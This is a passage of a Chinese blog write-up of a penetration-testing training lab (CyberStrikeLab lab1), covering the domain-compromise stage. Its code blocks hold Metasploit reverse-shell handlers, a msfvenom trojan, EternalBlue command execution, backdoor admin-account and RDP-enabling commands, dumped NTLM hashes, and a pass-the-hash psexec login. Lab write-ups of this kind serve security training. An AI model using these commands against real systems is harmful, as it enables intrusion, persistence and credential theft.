<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_http</span><br><span class="line">set LHOST 172.16.233.2</span><br><span class="line">set LPORT 4777</span><br><span class="line">run</span><br></pre></td></tr></table></figure></div>

<p>CS 启动监听，配置与 MSF 一致</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303122413992.png" class title="image-20250303122413992">

<p>选择 192.168.10.10 会话，spawn 选择刚配置的监听，点击 Choose，MSF 成功接收到 CS 的会话</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303122832054.png" class title="image-20250303122832054">

<p>MSF 配置路由</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -s 192.168.20.0/24</span><br><span class="line">run autoroute -p  //观测路由是否添加成功</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303123219982.png" class title="image-20250303123219982">

<p>MSF 设置 Socks 代理</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">search socks || use auxiliary/server/socks_proxy</span><br><span class="line">set SRVHOST 172.16.233.2</span><br><span class="line">run</span><br><span class="line">sudo vi /etc/proxychains4.conf  //修改配置文件和选项设置的一致，且注意sock4、sock5一致</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303123310096.png" class title="image-20250303123310096">

<p>永恒之蓝漏洞利用，尝试模块，发现 ms17_010_command 能够被利用</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">search ms17_010</span><br><span class="line">use 19</span><br><span class="line">set COMMAND whoami</span><br><span class="line">set RHOSTS 172.16.233.2</span><br><span class="line">run</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303123725242.png" class title="image-20250303123725242">

<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set COMMAND &#x27;dir C:\&#x27;</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303123932158.png" class title="image-20250303123932158">

<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">set COMMAND &#x27;type C:\flag.txt&#x27;</span><br><span class="line">run</span><br></pre></td></tr></table></figure></div>

<p>拿到第二个旗帜 </p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303124022556.png" class title="image-20250303124022556">

<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set COMMAND &#x27;net user abcc 123@abc /add&#x27;</span><br><span class="line">set COMMAND &#x27;net localgroup Administrators abcc /add&#x27;</span><br><span class="line">set COMMAND &#x27;REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 0 /f&#x27;</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303124059122.png" class title="image-20250303124059122">

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303124302763.png" class title="image-20250303124302763">

<p>远程桌面连接</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303124355986.png" class title="image-20250303124355986">

<p>.\用户名 登录，成功登录</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303154731381.png" class title="image-20250303154731381">

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303162638253.png" class title="image-20250303162638253">

<h3 id="域成员-192-168-20-20"><a href="#域成员-192-168-20-20" class="headerlink" title="域成员 - 192.168.20.20"></a>域成员 - 192.168.20.20</h3><p>这台机器使用永恒之蓝利用，但是一直利用失败，但因为我们已经拿下域控制器，所以换一种方式，去拿域控制器的 hash，对域成员做 PTH 攻击 </p>
<p>试了很久 CS 上线的问题，但仅仅在 MSF 做了代理，一直失败，因此考虑直接上线 MSF</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/x64/meterpreter/reverse_tcp</span><br><span class="line">set lhost 192.168.20.10</span><br><span class="line">set lport 23231</span><br><span class="line">run</span><br></pre></td></tr></table></figure></div>

<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.138 LPORT=6666 -f exe &gt; reverse.exe</span><br></pre></td></tr></table></figure></div>

<p>制作木马并上传，上传稍麻烦，因为代理问题，因此选择将木马上传到 192.168.10.10 主机上，通过 phpstudy 自带 php 开启 Web 服务，再通过 192.168.20.30 浏览器下载文件</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php.exe -S 0.0.0.0:22222</span><br></pre></td></tr></table></figure></div>

<p>访问并保存，运行即可</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303165436865.png" class title="image-20250303165436865">

<p>运行时注意管理员身份运行</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303173105964.png" class title="image-20250303173105964">

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303165555703.png" class title="image-20250303165555703">

<p>获取 hash</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303173046901.png" class title="image-20250303173046901">

<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:94bd5248e87cb7f2f9b871d40c903927:::</span><br><span class="line">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5bc02b7670084dd30471730cc0a1672c:::</span><br><span class="line">cyberweb:1105:aad3b435b51404eeaad3b435b51404ee:2de5cd0f15d1c070851d1044e1d95c90:::</span><br><span class="line">abcc:1106:aad3b435b51404eeaad3b435b51404ee:73f5d97549f033374fa6d9f9ce247ffd:::</span><br><span class="line">WIN-7NRTJO59O7N$:1000:aad3b435b51404eeaad3b435b51404ee:a0cde4eb68e4a2345b888c83eed3b196:::</span><br><span class="line">CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:fba62b6152431813b79b5e71c41b16d0:::</span><br></pre></td></tr></table></figure></div>

<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 -q python3 psexec.py -hashes :94bd5248e87cb7f2f9b871d40c903927 cyberstrikelab.com/administrator@192.168.20.20</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303173617800.png" class title="image-20250303173617800">

<p>拿到最后的旗帜</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303173712105.png" class title="image-20250303173712105">

		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>标题:</strong> CyberStrikeLab - lab1</li>
        <li><strong>作者:</strong> Octopus</li>
        <li><strong>创建于
                :</strong> 2025-03-05 16:04:17</li>
        
            <li>
                <strong>更新于
                    :</strong> 2025-03-05 19:33:26
            </li>
        
        <li>
            <strong>链接:</strong> https://redefine.ohevan.com/2025/03/05/CyberStrikeLab-lab1/
        </li>
        <li>
            <strong>
                版权声明:
            </strong>
            

            
                本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a> 进行许可。
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F%E9%9D%B6%E6%9C%BA/">#综合渗透靶机</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2025/03/05/HackTheBox-Editorial/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">HackTheBox - Editorial</span>
						<span class="post-nav-item">上一篇</span>
					</span>
				</a>
			</div>
			
			
		</div>
		


		
		<div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
			<div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        评论
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://example.example.com',
          lang: 'zh-CN',
          dark: 'body[class~="dark-mode"]',
          reaction: false,
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

		</div>
		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">目录</div>
		<div class="page-title">CyberStrikeLab - lab1</div>
		<ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A4%96%E7%BD%91%E4%BF%A1%E6%81%AF%E6%8E%A2%E6%B5%8B"><span class="nav-text">外网信息探测</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BE%B9%E7%95%8C%E7%AA%81%E7%A0%B4-192-168-10-10"><span class="nav-text">边界突破 - 192.168.10.10</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ThinkPHP-5-0-23-RCE"><span class="nav-text">ThinkPHP 5.0.23 RCE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3389-%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E8%BF%9E%E6%8E%A5"><span class="nav-text">3389 远程桌面连接</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="nav-text">数据库</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%9F%E6%B8%97%E9%80%8F"><span class="nav-text">域渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">内网信息收集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%9F%E6%8E%A7-192-168-20-30"><span class="nav-text">域控 - 192.168.20.30</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%9F%E6%88%90%E5%91%98-192-168-20-20"><span class="nav-text">域成员 - 192.168.20.20</span></a></li></ol></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2025</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">Octopus</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        共撰写了 7 篇文章
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">访问人数</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">总访问量</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a> 驱动</span>
            <span class="text-sm lg:block">主题&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.8.2</a></span>
        </div>
        
        
            <div>
                博客已运行 <span class="odometer" id="runtime_days" ></span> 天 <span class="odometer" id="runtime_hours"></span> 小时 <span class="odometer" id="runtime_minutes"></span> 分钟 <span class="odometer" id="runtime_seconds"></span> 秒
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	
	<div class="search-pop-overlay">
	<div class="popup search-popup">
		<div class="search-header">
			<span class="search-input-field-pre">
				<i class="fa-solid fa-keyboard"></i>
			</span>
			<div class="search-input-container">
				<input autocomplete="off" autocorrect="off" autocapitalize="off" placeholder="站内搜索您需要的内容..." spellcheck="false" type="search" class="search-input">
			</div>
			<span class="popup-btn-close">
				<i class="fa-solid fa-times"></i>
			</span>
		</div>
		<div id="search-result">
			<div id="no-result">
				<i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
			</div>
		</div>
	</div>
</div>
	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>



    
<script src="/js/build/tools/localSearch.js" type="module"></script>




    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>




    
<script src="/js/build/tools/runtime.js"></script>

    
<script src="/js/build/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





    
<script src="/js/build/layouts/bookmarkNav.js" type="module"></script>


	
</body>

</html>